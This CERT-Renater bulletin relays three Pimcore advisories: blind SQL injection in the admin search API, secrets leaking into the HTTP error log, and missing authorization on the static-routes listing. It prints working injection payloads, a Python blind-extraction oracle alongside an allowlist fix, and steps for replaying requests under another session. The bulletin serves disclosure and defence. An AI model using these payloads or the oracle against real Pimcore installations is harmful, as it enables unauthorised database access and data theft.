=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN046
_____________________________________________________________________

DATE                : 16/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running pimcore/pimcore (Composer) versions
                     prior to 12.3.1 (12.x branch) or prior to 11.5.14
                     (11.x branch).

=====================================================================
https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj
https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h
https://github.com/pimcore/pimcore/security/advisories/GHSA-m3r2-724c-pwgf
_____________________________________________________________________

Incomplete Patch: Blind SQL Injection in Admin Search Find API
High
astapc published GHSA-qvr7-7g55-69xj Jan 14, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 (12.x branch), <= 11.5.13 (11.x branch)

Patched versions
12.3.1 (12.x branch), 11.5.14 (11.x branch)


Description

Summary

An incomplete SQL injection patch in the Admin Search Find API allows
an authenticated attacker to perform blind SQL injection. The fix for
CVE-2023-30848 tried to stop injection by stripping SQL comments (--)
from the input and catching syntax errors, but neither step keeps
attacker-controlled input out of the query. Payloads that do not rely
on comments still execute, and the attacker can infer database
contents through boolean-based or time-based techniques. The endpoint
is part of the admin interface and the outcome is database
information disclosure.


Details

The vulnerability exists in the Admin Search Find API endpoint:

/admin/search/search/find

The patch for CVE-2023-30848 made two changes:

    SQL comments are removed by deleting every occurrence of --
    SQL syntax errors are caught and replaced with a generic exception

Relevant commit:
25ad867

Key changes include:

// remove sql comments
// (only the literal token '--' is deleted; the remaining content of
// $fields is still passed on unvalidated)
$fields = str_replace('--', '', $fields);

try {
    $hits = $searcherList->load();
} catch (SyntaxErrorException $syntaxErrorException) {
    // hides the database error text only; a syntactically valid
    // injected query runs normally and never reaches this branch
    throw new \InvalidArgumentException('Check your arguments.');
}

However, this mitigation is incomplete for the following reasons:

1. Only -- is filtered

SQL injection does not require SQL comments. Payloads using boolean 
conditions, SQL functions, or time-based expressions remain effective.

2. Exception handling only suppresses error output

While syntax errors no longer produce detailed error messages, the 
underlying SQL query is still executed. This allows attackers to 
perform blind SQL injection.

3. User-controlled input is still used in SQL query construction

The fields[] parameter is attacker-controlled and can be abused to
inject SQL expressions into the generated query.

As a result, attackers can craft payloads that do not trigger syntax 
errors and still influence SQL execution.


PoC

The following request demonstrates a blind SQL injection via the 
fields[] parameter.

Boolean-based Blind Injection

GET /admin/search/search/find?query=2&fields[]=field1 AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END)=1~field2&filter=[{"property":"value"}]&class=classname

Time-based Blind Injection

GET /admin/search/search/find?query=2&fields[]=field1 AND IF(1=1,SLEEP(5),0)~field2&filter=[{"property":"value"}]&class=classname

Observed behavior:

    When the condition is true, the response is delayed (e.g., ~5 seconds)

    When the condition is false, the response is returned immediately

This confirms that injected SQL expressions are executed successfully.
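To make points 1 to 3 and the PoC concrete, here is an added example (not Pimcore's code) that models the patched-but-still-injectable pattern in Python over an in-memory SQLite table. The table and its rows, the name~value shape of the fields[] entries and the way the name is spliced unquoted into the WHERE clause are assumptions standing in for the real query; SQLite has no SLEEP(), so only the boolean-based variant is shown. The same file shows what the -- filter should have been: validate the field name against an allowlist of real column identifiers and bind the value.

```python
"""Model of the incomplete CVE-2023-30848 mitigation and an allowlist fix.

Added example, not Pimcore code. Assumed (simplified) behaviour: each
fields[] entry is "name~value", the name is spliced unquoted into the WHERE
clause and the value is bound. The table is a constructed stand-in for the
search index; SQLite replaces MySQL, so only the boolean-based payload is used.
"""
import re
import sqlite3


def make_db():
    """Constructed sample data standing in for the search index table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE search_backend_data "
               "(id INTEGER PRIMARY KEY, data TEXT, userowner INTEGER)")
    db.executemany("INSERT INTO search_backend_data VALUES (?, ?, ?)",
                   [(1, "row one", 3), (2, "row two", 5), (3, "other", 3)])
    return db


def find_vulnerable(db, fields):
    """The patched-but-still-injectable pattern: strip '--', catch syntax
    errors, and still concatenate the attacker-controlled name into SQL."""
    clauses, params = [], []
    for entry in fields:
        entry = entry.replace("--", "")          # str_replace('--', '', $fields)
        name, _, value = entry.partition("~")
        clauses.append(f"{name} LIKE ?")         # name is neither validated nor quoted
        params.append(f"%{value}%")
    sql = "SELECT id FROM search_backend_data WHERE " + " AND ".join(clauses)
    try:
        return [row[0] for row in db.execute(sql, params)]
    except sqlite3.OperationalError:             # the generic-exception rewrite
        raise ValueError("Check your arguments.")


IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def find_hardened(db, fields):
    """Allowlist fix: the name must be a plain identifier that exists as a
    column of the table; anything else is rejected before SQL is built."""
    allowed = {row[1] for row in db.execute("PRAGMA table_info(search_backend_data)")}
    clauses, params = [], []
    for entry in fields:
        name, _, value = entry.partition("~")
        if not IDENTIFIER.match(name) or name not in allowed:
            raise ValueError("Check your arguments.")
        clauses.append(f'"{name}" LIKE ?')       # quoted identifier, bound value
        params.append(f"%{value}%")
    sql = "SELECT id FROM search_backend_data WHERE " + " AND ".join(clauses)
    return [row[0] for row in db.execute(sql, params)]


def boolean_payload(condition):
    """Comment-free payload in the shape of the advisory's PoC: the injected
    CASE expression decides whether the legitimate LIKE filter applies."""
    return f"id AND (SELECT CASE WHEN ({condition}) THEN 1 ELSE 0 END)=1 AND data~row"


def oracle(db, condition):
    """True if the injected condition holds: rows come back only then."""
    return len(find_vulnerable(db, [boolean_payload(condition)])) > 0


def leak_owner_of_row(db, row_id, candidates=range(0, 10)):
    """Blind inference: one yes/no question per candidate value."""
    for c in candidates:
        if oracle(db, f"(SELECT userowner FROM search_backend_data WHERE id={row_id})={c}"):
            return c
    return None


def syntax_error_is_hidden(db):
    """The catch block only hides the database's error text; a payload that
    parses is executed, a broken one yields the generic message."""
    try:
        find_vulnerable(db, ["id AND (~row"])
    except ValueError as exc:
        return str(exc) == "Check your arguments."
    return False


def hardened_rejects_payload(db):
    try:
        find_hardened(db, [boolean_payload("1=1")])
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(oracle(db, "1=1"), oracle(db, "1=2"))
    print(leak_owner_of_row(db, 1))
    print(syntax_error_is_hidden(db))
    print(find_hardened(db, ["data~row"]))
    print(hardened_rejects_payload(db))
```

The payload contains no comment and parses cleanly, so it passes both the -- filter and the syntax-error catch; the oracle returns rows only when the injected condition is true, which is enough to read a column one yes/no question at a time. The hardened variant rejects the same payload before any SQL is assembled, and because it checks the identifier itself rather than blocking particular tokens it does not depend on anticipating the next bypass.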


Impact

This is a Blind SQL Injection vulnerability.

    Affected users: Systems exposing the Admin Search Find API to authenticated users

    Attack requirements: Authenticated access to the admin interface

    Potential impact:

        Database schema enumeration

        Extraction of sensitive data via blind SQL injection

        Potential full database compromise depending on database privileges

This issue demonstrates that the fix for CVE-2023-30848 is incomplete.


Severity
High

CVE ID
CVE-2026-23492

Weaknesses
Weakness CWE-89

Credits

    @Snow1nd Snow1nd Reporter

_____________________________________________________________________

ENV Variables and Cookie Information exposed in http_error_log
High
astapc published GHSA-q433-j342-rp9h Jan 15, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 (12.x branch), <= 11.5.13 (11.x branch)

Patched versions
12.3.1 (12.x branch), 11.5.14 (11.x branch)


Description

Summary

The http_error_log stores the complete $_COOKIE and $_SERVER arrays for
each recorded error. $_SERVER includes the environment variables passed
to the PHP process, so database passwords and other secrets configured
through the environment, together with the session cookies of the
visitor who triggered the error, can be read back through the Pimcore
backend.


Details

Both lines should be removed, as storing these arrays serves no purpose
in this context. Note that removing them only stops new entries from
recording the data: entries already in the log keep their stored
$_COOKIE and $_SERVER contents until they are deleted.

https://github.com/pimcore/pimcore/blob/12.x/bundles/SeoBundle/src/EventListener/ResponseExceptionListener.php#L92
https://github.com/pimcore/pimcore/blob/12.x/bundles/SeoBundle/src/EventListener/ResponseExceptionListener.php#L93


PoC

In the Pimcore backend, navigate to "Search Engine Optimization" and
click on "HTTP Errors." Double-click on an entry to view its details.
Here, you may find sensitive data exposed.


Impact

Pimcore backend users can access sensitive environment variables,
potentially exposing critical information.

Severity
High
8.6/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

CVE ID
CVE-2026-23493

Weaknesses
No CWEs


Credits

    @putzflorian putzflorian Reporter
_____________________________________________________________________

Broken Access Control: Missing Function Level Authorization on
"Static Routes" Listing

Moderate
astapc published GHSA-m3r2-724c-pwgf Jan 15, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 (12.x branch), <= 11.5.13 (11.x branch)

Patched versions
12.3.1 (12.x branch), 11.5.14 (11.x branch)


Description

Summary

The application fails to enforce proper server-side authorization
checks on the API endpoint responsible for reading or listing static
routes. In Pimcore, static routes are custom URL patterns defined via
the backend interface or the var/config/staticroutes.php file,
including details like regex-based patterns, controllers, variables,
and priorities. These routes are registered automatically through the
PimcoreStaticRoutesBundle and integrated into the MVC routing system.
Testing revealed that an authenticated backend user lacking explicit
permissions was able to invoke the endpoint
(e.g., GET /api/static-routes) and retrieve sensitive route
configurations. This violates OWASP A01:2021 Broken Access Control,
as function-level authorization is absent, allowing unauthorized
access to internal routing metadata. Without validation, the
endpoint exposes route structures, potentially revealing application
architecture, endpoints, or custom logic intended for administrative
roles only.


Details

A backend user without the relevant permission was still able to list
the "Static Routes" items.

Steps to reproduce:

1. Log in as an admin (full permissions) and open "Static Routes" in the
   backend.

2. Capture and save the request the backend sends for the list API.

3. Log in as a backend user with no permissions.

4. Copy that user's "Cookie" and "X-Pimcore-Csrf-Token" header values.

5. Paste the copied "Cookie" and "X-Pimcore-Csrf-Token" into the captured
   list API request and resend it. The static routes list is returned to
   the unprivileged user.
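The copy-and-resend procedure above generalises to a differential check: replay one captured request under each available session and flag every session that gets the privileged answer back. The following added example (not Pimcore code) does that against two constructed in-process stand-ins, one reproducing the missing check and one with a per-function permission check. The session cookies, CSRF tokens, route data and the "routes" permission name are assumptions, and the path is the advisory's illustrative /api/static-routes. Against a live instance, server would be replaced by a function that performs the HTTP request.

```python
"""Differential replay check for missing function-level authorization.

Added example, not Pimcore code. Both "servers" are constructed in-process
stand-ins for the vulnerable and the fixed behaviour; session cookies, CSRF
tokens, the 'routes' permission name and the route data are invented, and
the request path is the advisory's illustrative one.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Request:
    method: str
    path: str
    headers: dict


# Constructed server-side state: session -> granted backend permissions,
# and the CSRF token bound to each session.
PERMISSIONS = {"PHPSESSID=s-admin": {"routes", "users"}, "PHPSESSID=s-lowpriv": set()}
CSRF_TOKENS = {"PHPSESSID=s-admin": "csrf-admin", "PHPSESSID=s-lowpriv": "csrf-low"}
STATIC_ROUTES = [{"name": "news", "pattern": "/news/(\\d+)",
                  "controller": "App\\Controller\\NewsController::detailAction"}]


def _authenticated(req):
    """Shared by both servers: a valid session and its CSRF token are
    required. This is authentication, not authorization."""
    sid = req.headers.get("Cookie")
    return sid in PERMISSIONS and req.headers.get("X-Pimcore-Csrf-Token") == CSRF_TOKENS[sid]


def vulnerable_server(req):
    """Only checks that the caller is some backend user."""
    if not _authenticated(req):
        return 403, None
    if req.method == "GET" and req.path == "/api/static-routes":
        return 200, STATIC_ROUTES            # no function-level check
    return 404, None


def fixed_server(req):
    """Same, plus a per-function permission check before returning data."""
    if not _authenticated(req):
        return 403, None
    if req.method == "GET" and req.path == "/api/static-routes":
        if "routes" not in PERMISSIONS[req.headers["Cookie"]]:
            return 403, None                 # assumed permission name
        return 200, STATIC_ROUTES
    return 404, None


# The request captured from the admin session, and the header sets of the
# sessions to replay it with (what the advisory's steps do by hand).
CAPTURED = Request("GET", "/api/static-routes",
                   {"Cookie": "PHPSESSID=s-admin", "X-Pimcore-Csrf-Token": "csrf-admin"})
SESSIONS = {
    "admin": {"Cookie": "PHPSESSID=s-admin", "X-Pimcore-Csrf-Token": "csrf-admin"},
    "lowpriv": {"Cookie": "PHPSESSID=s-lowpriv", "X-Pimcore-Csrf-Token": "csrf-low"},
}


def replay(server, captured, sessions):
    """Re-send the captured request with each session's Cookie/CSRF headers."""
    out = {}
    for name, hdrs in sessions.items():
        out[name] = server(Request(captured.method, captured.path, {**captured.headers, **hdrs}))
    return out


def unauthorized_sessions(server, captured, sessions, privileged="admin"):
    """Sessions that received the privileged session's successful response."""
    res = replay(server, captured, sessions)
    status, body = res[privileged]
    if status != 200:
        return []
    return sorted(n for n, r in res.items() if n != privileged and r == (status, body))


if __name__ == "__main__":
    print(unauthorized_sessions(vulnerable_server, CAPTURED, SESSIONS))
    print(unauthorized_sessions(fixed_server, CAPTURED, SESSIONS))
```

The comparison is on status and body together, so a 200 with an empty or error body for the low-privileged session is not counted as a finding; only an identical successful response is. Run the same harness over every captured backend list request rather than this one endpoint, since the missing check is a per-function mistake and each function needs its own test.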


Impact

Exploitation enables low-privileged users to enumerate static routes,
gaining reconnaissance into URL patterns, associated controllers,
and parameter handling, which could facilitate targeted attacks like
path traversal, injection via exposed variables, or discovery of
hidden administrative paths. In a Pimcore environment, this might
expose site-specific routing for multi-tenant setups, leading to
unauthorized data access, workflow manipulation, or escalation to
broader system compromise. Business impacts include intellectual
property leakage of custom routing logic, regulatory
non-compliance (e.g., GDPR for exposed configs), and increased
attack surface for chaining with other vulnerabilities.


Severity
Moderate
4.3/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE ID
CVE-2026-23494

Weaknesses
Weakness CWE-284

Credits

    @ytlamal ytlamal Finder


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================




